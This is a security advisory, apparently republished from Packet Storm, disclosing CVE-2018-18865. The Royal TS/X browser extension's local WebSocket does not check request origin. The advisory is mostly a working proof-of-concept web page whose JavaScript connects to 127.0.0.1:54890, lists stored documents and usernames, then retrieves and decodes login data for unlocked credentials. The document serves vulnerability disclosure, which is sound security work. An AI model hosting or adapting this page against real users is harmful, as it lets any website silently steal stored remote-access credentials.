
Royal TS/X Information Disclosure

2018-11-0200:00:00
Jakub Palaczynski
packetstormsecurity.com

`Title: Royal TS/X - Information Disclosure  
Author: Jakub Palaczynski  
Date: 10. July 2018  
CVE: CVE-2018-18865  
  
Affected product:  
=============  
  
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta  
  
  
Vulnerability - Information Disclosure:  
=============================  
  
Any third-party web application can steal credentials stored in Royal TS/X  
when the browser extension is enabled.  
The browser extension communicates over WebSockets (default TCP port 54890),  
and the WebSocket endpoint performs no validation of the origin of the request.  
  
  
PoC website:  
==========  
  
<!DOCTYPE html>  
<meta charset="utf-8" />  
<title>RoyalTS/X Exploit</title>  
<script language="javascript" type="text/javascript">  
  
// Address of the Royal TS/X browser-extension WebSocket listener on the local
// host (default TCP port 54890, as stated in the advisory text above).
var wsUri = "ws://127.0.0.1:54890/";  
// Container element that writeToScreen() appends output lines to; set by init().
var output;  
  
/**
 * Page entry point (wired to the window "load" event below): looks up the
 * #output container, stores it in the shared `output` variable, then starts
 * the WebSocket exchange.
 */
function init()
{
  var container = document.getElementById("output");
  output = container;
  testWebSocket();
}
  
/**
 * Opens a WebSocket to `wsUri` and attaches the handlers defined in this
 * script. Once the connection is open, a "GetDocuments" request is sent.
 *
 * `websocket` is never declared with var, so this assignment creates an
 * implicit global that the other handlers (onMessage, doSend) rely on.
 */
function testWebSocket()
{
  writeToScreen("Let's retrieve some data...");
  var documentsRequest = "{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}";
  websocket = new WebSocket(wsUri);
  websocket.onopen = function(evt) { onOpen(evt, documentsRequest); };
  // The remaining handlers take only the event, so they can be attached directly.
  websocket.onclose = onClose;
  websocket.onmessage = onMessage;
  websocket.onerror = onError;
}
  
/**
 * "open" handler: the event itself carries nothing this script needs, so the
 * prepared request string is simply forwarded to doSend().
 *
 * @param {Event} evt - WebSocket open event (unused).
 * @param {string} message - JSON request to send on the freshly opened socket.
 */
function onOpen(evt, message)
{
  var payload = message;
  doSend(payload);
}
  
/**
 * "close" handler. Intentionally a no-op: the script reopens the socket
 * itself from onMessage when it needs another request, so nothing is done
 * here.
 *
 * @param {CloseEvent} evt - WebSocket close event (unused).
 */
function onClose(evt) { /* nothing to clean up */ }
  
/**
 * Handles every message received on the extension's WebSocket.
 *
 * Replies are dispatched on their "Command" field:
 *  - "GetDocuments": for each entry in ResponseData, prints Name and Unlocked,
 *    then UserName and URL of each entry in its Credentials list. When the
 *    document is Unlocked, the current socket is closed and a new one opened
 *    whose onopen sends a "GetLoginInformation" request for that credential's ID.
 *  - "GetLoginInformation": prints ResponseData after base64 decoding.
 *
 * Nothing in this exchange (and, per the advisory, nothing on the server side)
 * checks which origin opened the socket; that missing origin validation is the
 * weakness the advisory describes, and an Origin check on the listener is the
 * corresponding mitigation.
 *
 * @param {MessageEvent} evt - WebSocket message; evt.data is expected to be a
 *   JSON string (not checked here — JSON.parse throws on anything else).
 */
function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
// for...in iterates property keys, so x and y are index strings, not entries.
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
// Replace the socket: the existing one is closed and a fresh connection
// carries the follow-up request once it opens.
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
// Replies on the new socket come back through this same handler.
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
// Redundant re-parse of evt.data: obj already holds the same object.
var obj = JSON.parse(evt.data);
// ResponseData is base64 here; everything printed goes through innerHTML
// in writeToScreen, so the decoded text is rendered as markup.
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}
  
/**
 * "error" handler: prints a red ERROR marker followed by evt.data.
 *
 * The prefix is deliberately HTML, since writeToScreen() renders via innerHTML.
 * NOTE(review): a WebSocket error event normally has no `data` property, so
 * this will usually print "undefined" after the marker — confirm in a browser.
 *
 * @param {Event} evt - WebSocket error event.
 */
function onError(evt)
{
  var marker = '<span style="color: red;">ERROR:</span> ';
  var text = marker + evt.data;
  writeToScreen(text);
}
  
/**
 * Sends `message` on the shared `websocket` (the implicit global assigned in
 * testWebSocket / onMessage).
 *
 * @param {string} message - JSON request string.
 */
function doSend(message)
{
  var socket = websocket;
  socket.send(message);
}
  
/**
 * Appends `message` to the #output container as a new paragraph.
 *
 * The text is assigned through innerHTML, so it is interpreted as markup.
 * Callers pass values taken straight from the WebSocket reply, which means
 * the listener's data is rendered unescaped on this page.
 *
 * @param {string} message - Text (or HTML) to display.
 */
function writeToScreen(message)
{
  var line = document.createElement("p");
  line.style.wordWrap = "break-word";
  line.innerHTML = message;
  output.appendChild(line);
}
  
// Defer init() until "load" so the #output element exists when it is looked up.
window.addEventListener("load", init, false);  
  
</script>  
  
<h2>RoyalTS/X Exploit</h2>  
  
<div id="output"></div>  
  
  
Contact:  
=======  
  
Jakub[dot]Palaczynski[at]gmail[dot]com  
  
  
`
